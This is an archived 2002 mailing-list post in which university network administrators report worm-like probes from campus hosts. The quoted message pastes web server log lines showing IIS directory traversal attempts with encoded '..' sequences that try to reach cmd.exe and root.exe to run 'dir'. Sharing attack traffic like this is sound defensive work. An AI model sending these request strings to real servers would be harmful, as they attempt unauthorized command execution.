MSUNAG Archives

MSUNAG Archives


View:

Next Message | Previous Message
Next in Topic | Previous in Topic
Next by Same Author | Previous by Same Author
Chronologically | Most Recent First
Proportional Font | Monospaced Font

Options:

Join or Leave MSUNAG
Reply | Post New Message
Search Archives


Subject: Re: MS Virus or Worm activity
From: Paul Donahue <[log in to unmask]>
Reply-To:MSU Network Administrators Group <[log in to unmask]>
Date:Mon, 21 Jan 2002 09:26:54 -0500
Content-Type:text/plain
Parts/Attachments:
Parts/Attachments

text/plain (71 lines) 


Not to be a "me-too"er but I have noticed the same from the same IP
addresses on one of our windows boxes. ZoneAlarm showed approximately
400 alerts since 6pm Friday until 8am this morning.




Paul Donahue
Lead Computer/Network Technician
CVM Information Technology Center
A227 VMC, Michigan State University
Phone:  353-5551   Fax:  432-2937

>>> [log in to unmask] 01/21/02 08:51AM >>>
Probes from these hosts started coming in just before 11:00pm Saturday
night:

35.8.164.90 - bigone.hrt.msu.edu
35.8.33.189 - fpc04.nscl.msu.edu
35.8.34.114 - cycpc54.nscl.msu.edu
35.8.33.203 - talon.nscl.msu.edu
35.8.107.198 - No host name in DNS. Domain: llc,
  Language Learning Center in Old Hort


Probe examples:

35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/MSADC/root.exe?/c+dir
HTTP/1.0" 404 286
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
404 327
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
404 327
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/syste
m32/cmd.exe?/c+dir HTTP/1.0" 404 343
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
35.8.33.189 - - [21/Jan/2002:08:37:14 -0500] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310

--
Gene Willacker, Systems Analyst
MSU Division of Housing and Food Service
Food Stores Building
171 Service Road
East Lansing, MI 48824-1233
517-353-1691

Back to: Top of Message | Previous Page | Main MSUNAG Page

Permalink


LIST.MSU.EDU

CataList Email List Search Powered by the LISTSERV Email List Manager